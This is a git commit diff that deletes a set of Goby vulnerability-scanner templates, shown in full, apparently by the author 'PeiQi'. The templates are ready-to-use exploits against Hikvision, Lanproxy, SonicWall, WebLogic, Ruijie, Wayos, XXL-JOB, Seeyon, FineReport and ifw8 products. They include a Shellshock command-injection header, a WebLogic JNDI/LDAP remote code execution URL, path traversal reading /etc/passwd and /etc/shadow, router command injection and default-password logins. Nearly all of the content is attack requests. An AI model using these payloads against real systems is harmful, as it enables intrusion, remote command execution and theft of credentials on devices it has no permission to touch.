test 2022-11-25 18:58:59 +08:00
parent b62a548143
commit 95c480e0f9
15 changed files with 0 additions and 885 deletions


@ -1,78 +0,0 @@
{
"Name": "HIKVISION 视频编码设备接入网关 任意文件下载",
"Level": "1",
"Tags": [
"任意文件下载"
],
"GobyQuery": "(app=\"Hikvision-Video-coding-device-access-gateway\" || title=\"视频编码设备接入网关\")",
"Description": "海康威视视频接入网关系统在页面/serverLog/downFile.php的参数fileName存在任意文件下载漏洞\n\n访问 http://xxx.xxx.xxx.xxx/serverLog/downFile.php?fileName=../web/html/serverLog/downFile.php 下载文件",
"Product": "HIKVISION 视频编码设备接入网关",
"Homepage": "https://www.hikvision.com/cn/",
"Author": "PeiQi",
"Impact": "<p>🐏</p>",
"Recommandation": "<p>undefined</p>",
"References": [
"http://wiki.peiqi.tech"
],
"HasExp": true,
"ExpParams": [
{
"name": "Filename",
"type": "select",
"value": "../web/html/data/saveUserInfo.php,../../../../../../WINDOWS/system32/drivers/etc/hosts,../web/html/serverLog/downFile.php",
"show": ""
}
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/serverLog/downFile.php?fileName=../web/html/serverLog/downFile.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "$file_name=",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/serverLog/downFile.php?fileName={{{Filename}}}",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"SetVariable": [
"output|lastbody"
]
}
],
"PostTime": "2021-02-06 14:59:46",
"GobyVersion": "1.8.237"
}


@ -1,78 +0,0 @@
{
"Name": "Lanproxy 目录遍历漏洞 CVE-2021-3019",
"Level": "2",
"Tags": [
"目录遍历"
],
"GobyQuery": "header=\"Server: LPS-0.1\"",
"Description": "Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具支持tcp流量转发可支持任何tcp上层协议访问内网网站、本地支付接口调试、ssh访问、远程桌面等等本次Lanproxy 路径遍历漏洞 (CVE-2021-3019)通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。",
"Product": "Lanproxy 0.1",
"Homepage": "https://github.com/ffay/lanproxy",
"Author": "PeiQi",
"Impact": "<h5><span style=\"font-size: 1.25em; color: rgb(65, 140, 175);\">咩咩咩</span>🐑</h5>",
"Recommandation": "<p>undefined</p>",
"References": [
"http://wiki.peiqi.tech"
],
"HasExp": true,
"ExpParams": [
{
"name": "Filename",
"type": "select",
"value": "/../../../../../../../../../../etc/passwd,/../conf/config.properties,/../../../../../../../../../../etc/shadow",
"show": ""
}
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/../conf/config.properties",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "server.ssl",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "{{{Filename}}}",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"SetVariable": [
"output|lastbody"
]
}
],
"PostTime": "2021-01-22 18:20:52",
"GobyVersion": "1.8.237"
}


@ -1,82 +0,0 @@
{
"Name": "SonicWall SSL-VPN 远程命令执行漏洞",
"Level": "3",
"Tags": [
"RCE"
],
"GobyQuery": "(app=\"SonicWALL-Company's-product\" || app=\"SonicWALL-SSL-VPN\")",
"Description": "SonicWall SSL-VPN 远程命令执行在1月24日被公开 EXP此设备存在远程命令执行漏洞",
"Product": "SonicWall SSL-VPN",
"Homepage": "https://www.sonicwall.com/",
"Author": "PeiQi",
"Impact": "<p>🐏</p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"HasExp": true,
"ExpParams": [
{
"name": "Cmd",
"type": "input",
"value": "cat /etc/passwd",
"show": ""
}
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/cgi-bin/jarrewrite.sh",
"follow_redirect": true,
"header": {
"User-Agent": "() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'"
},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "root",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/cgi-bin/jarrewrite.sh",
"follow_redirect": true,
"header": {
"User-Agent": "() { :; }; echo ; /bin/bash -c '{{{Cmd}}}'"
},
"data_type": "text",
"data": ""
},
"SetVariable": [
"output|lastbody"
]
}
],
"PostTime": "2021-01-26 15:28:34",
"GobyVersion": "1.8.237"
}


@ -1,55 +0,0 @@
{
"Name": "Wayos AC集中管理系统默认弱口令 CNVD-2021-00876",
"Level": "2",
"Tags": [
"弱口令"
],
"GobyQuery": "title=\"AC集中管理平台\" && body=\"login_25.jpg\"",
"Description": "深圳维盟科技股份有限公司是国内领先的网络设备及智能家居产品解决方案供应商主营产品包括无线网关、交换机、国外VPN、双频吸顶ap等。\n\nAC集中管理平台存在弱口令漏洞攻击者可利用该漏洞获取敏感信息。\n弱口令 admin:admin",
"Product": "深圳维盟科技股份有限公司AC集中管理平台",
"Homepage": "http://www.wayos.com/",
"Author": "PeiQi",
"Impact": "<p>🐏</p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/login.cgi",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "user=admin&password=admin"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "not contains",
"value": "flag=0",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-02-07 23:13:20",
"GobyVersion": "1.8.237"
}


@ -1,87 +0,0 @@
{
"Name": "Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109",
"Level": "3",
"Tags": [
"RCE"
],
"GobyQuery": "app=\"Oracle-Weblogic_interface_7001\" || app=\"Oracle-BEA-WebLogic-Server\" || title==\"Error 404--Not Found\"",
"Description": "2021年1月20日绿盟科技监测发现Oracle官方发布了2021年1月关键补丁更新公告CPUCritical Patch Update共修复了329个不同程度的漏洞其中包括7个影响WebLogic的严重漏洞CVE-2021-1994、CVE-2021-2047、CVE-2021-2064、CVE-2021-2108、CVE-2021-2075、CVE-2019-17195、CVE-2020-14756未经身份验证的攻击者可通过此次的漏洞实现远程代码执行。CVSS评分均为9.8,利用复杂度低。建议用户尽快采取措施,对上述漏洞进行防护。\n\nWebLogic Server 10.3.6.0.0\nWebLogic Server 12.1.3.0.0\nWebLogic Server 12.2.1.3.0\nWebLogic Server 12.2.1.4.0\nWebLogic Server 14.1.1.0.0",
"Product": "WebLogicd",
"Homepage": "https://www.oracle.com/middleware/technologies/weblogic.html",
"Author": "PeiQi",
"Impact": "<p><span style=\"color: rgb(65, 140, 175);\">咩咩咩🐑</span></p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"HasExp": true,
"ExpParams": [
{
"name": "Cmd",
"type": "input",
"value": "whoami",
"show": ""
},
{
"name": "Ldap",
"type": "input",
"value": "ldap://xxx.xxx.xxx;xxx:1389",
"show": ""
}
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/console/css/%252e%252e%252f/consolejndi.portal?",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "JNDI",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/console/css/%252e%252e%252f/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{{{Ldap}}}/Basic/WeblogicEcho;AdminServer%22)",
"follow_redirect": true,
"header": {
"cmd": "{{{Cmd}}}"
},
"data_type": "text",
"data": ""
},
"SetVariable": [
"output|lastbody"
]
}
],
"PostTime": "2021-01-22 13:55:45",
"GobyVersion": "1.8.237"
}


@ -1,101 +0,0 @@
{
"Name": "Weblogic SSRF漏洞 CVE-2014-4210",
"Level": "2",
"Tags": [
"SSRF"
],
"GobyQuery": "app=\"Oracle-Weblogic_interface_7001\" || app=\"Oracle-BEA-WebLogic-Server\" || title==\"Error 404--Not Found\"",
"Description": "Weblogic中存在一个SSRF漏洞利用该漏洞可以发送任意HTTP请求进而攻击内网中redis、fastcgi等脆弱组件此漏洞可通过HTTP协议利用未经身份验证的远程攻击者可利用此漏洞影响受影响组件的机密性\n\nOracle WebLogic Server 10.0.2.0\nOracle WebLogic Server 10.3.6.0\n\nhttp://xxx.xxx.xxx.xxx:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://xxx.xxx.xxx.xxx:7001",
"Product": "Oracle WebLogic Server",
"Homepage": "https://www.oracle.com",
"Author": "PeiQi",
"Impact": "<p><span style=\"color: rgb(65, 140, 175);\">咩咩咩🐑</span></p>",
"Recommandation": "<p>undefined</p>",
"References": [
"http://wiki.peiqi.tech"
],
"HasExp":true,
"ExpParams":[
{
"name":"payload",
"type":"input",
"value":"127.0.0.1:7001",
"show":""
}
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/uddiexplorer/SearchPublicRegistries.jsp",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "Search",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"OR",
{
"Request": {
"method": "GET",
"uri": "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://{{{payload}}}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"SetVariable": ["output|lastbody|regex|weblogic.uddi.client.structures.exception.XML_SoapException:(.*)"]
},
{
"Request": {
"method": "GET",
"uri": "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://{{{payload}}}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"SetVariable": ["output|lastbody|regex|weblogic.uddi.client.structures.exception.XML_SoapException:(.*)"]
},
{
"Request": {
"method": "GET",
"uri": "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://{{{payload}}}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"SetVariable": ["output|lastbody|regex|weblogic.uddi.client.structures.exception.XML_SoapException:(.*)"]
}
],
"PostTime": "2021-01-23 20:47:39",
"GobyVersion": "1.8.237"
}


@ -1,60 +0,0 @@
{
"Name": "XXL-JOB 任务调度中心 后台默认弱口令",
"Level": "2",
"Tags": [],
"GobyQuery": "(app=\"XXL-JOB\" || title=\"任务调度中心\")",
"Description": "",
"Product": "",
"Homepage": "https://gobies.org/",
"Author": "gobysec@gmail.com",
"Impact": "",
"Recommandation": "",
"References": [
"https://gobies.org/"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/login",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
},
"data_type": "text",
"data": "userName=admin&password=123456"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "not contains",
"value": "500",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-03-17 12:24:54",
"GobyVersion": "1.8.237"
}


@ -1,53 +0,0 @@
{
"Name": "致远OA A6 数据库敏感信息泄露",
"Level": "1",
"Tags": [
"敏感信息泄露"
],
"GobyQuery": "(app=\"致远互联-OA\" || app=\"Seeyon-Server\"|| app=\"用友-致远OA\" || (server=\"Seeyon-Server\") || (body=\"/seeyon/USER-DATA/IMAGES/LOGIN/login.gif\" || title=\"用友致远A\" || body=\"/yyoa/\" || header=\"path=/yyoa\" || server==\"SY8044\" || (body=\"A6-V5企业版\" && body=\"seeyon\" && body=\"seeyonProductId\") || (body=\"/seeyon/common/\" && body=\"var _ctxpath = '/seeyon'\") || (body=\"A8-V5企业版\" && body=\"/seeyon/\"))",
"Description": "致远OA A6 存在数据库敏感信息泄露攻击者可以通过访问特定的URL获取数据库账户以及密码 MD5",
"Product": "致远OA A6",
"Homepage": "PeiQi",
"Author": "PeiQi",
"Impact": "<p>🐏</p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/yyoa/createMysql.jsp",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "root",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-03-18 21:36:42",
"GobyVersion": "1.8.237"
}


@ -1,84 +0,0 @@
{
"Name": "帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757",
"Level": "1",
"Tags": [
"任意文件读取"
],
"GobyQuery": "app=\"fanruansem-FineReport\"",
"Description": "FineReport报表软件是一款纯Java编写的集数据展示(报表)和数据录入(表单)功能于一身的企业级web报表工具。\n\nFineReport 8.0版本存在任意文件读取漏洞,攻击者可利用漏洞读取网站任意文件。",
"Product": "FineReport 8.0版本",
"Homepage": "PeiQi",
"Author": "PeiQi",
"Impact": "<p>🐏</p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"ScanSteps": [
"OR",
{
"Request": {
"method": "GET",
"uri": "/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "CDATA",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "GET",
"uri": "/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "CDATA",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-03-21 19:44:01",
"GobyVersion": "1.8.237"
}


@ -1,70 +0,0 @@
{
"Name": "蜂网互联 企业级路由器v4.31 密码泄露漏洞 CVE-2019-16313",
"Level": "2",
"Tags": [
"账号密码泄露"
],
"GobyQuery": "(title=\"登录界面\" && app=\"ifw8-Router\")",
"Description": "蜂网互联企业级路由器v4.31存在接口未授权访问,导致攻击者可以是通过此漏洞得到路由器账号密码接管路由器",
"Product": "蜂网互联企业级路由器v4.31",
"Homepage": "http://www.ifw8.cn/",
"Author": "PeiQi",
"Impact": "<p>🐏</p>",
"Recommandation": "<p>undefined</p>",
"References": [
"http://wiki.peiqi.tech"
],
"HasExp": true,
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/action/usermanager.htm",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "pwd",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/action/usermanager.htm",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"SetVariable": [
"output|lastbody"
]
}
],
"PostTime": "2021-02-21 11:22:17",
"GobyVersion": "1.8.237"
}


@ -1,137 +0,0 @@
{
"Name": "锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞",
"Level": "3",
"Tags": [
"远程命令执行"
],
"GobyQuery": "(app=\"Ruijie-EG\" || title=\"锐捷网络-EWEB网管系统\" || app=\"Ruijie--EWEB\")",
"Description": "锐捷NBR路由器 EWEB网管系统部分接口存在命令注入导致远程命令执行获取权限",
"Product": "锐捷NBR路由器 EWEB网管系统",
"Homepage": "http://www.ruijie.com.cn/",
"Author": "PeiQi",
"Impact": "<p>🐏</p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"HasExp": true,
"ExpParams": [
{
"name": "Cmd",
"type": "input",
"value": "cat /etc/passwd",
"show": ""
}
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/guest_auth/guestIsUp.php",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "mac=1&ip=127.0.0.1|cat /etc/passwd > PeiQi.txt"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "GET",
"uri": "/guest_auth/guestIsUp.php",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "!=",
"value": "404",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "not contains",
"value": "File not found.",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "not contains",
"value": ">__<",
"bz": ""
},
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"OR",
{
"Request": {
"method": "POST",
"uri": "/guest_auth/guestIsUp.php",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "mac=1&ip=127.0.0.1|{{{Cmd}}} > PeiQi.txt"
},
"SetVariable": [
"output|lastbody"
]
},
{
"Request": {
"method": "GET",
"uri": "/guest_auth/PeiQi.txt",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": ""
},
"SetVariable": [
"output|lastbody"
]
}
],
"PostTime": "2021-01-26 10:37:09",
"GobyVersion": "1.8.230"
}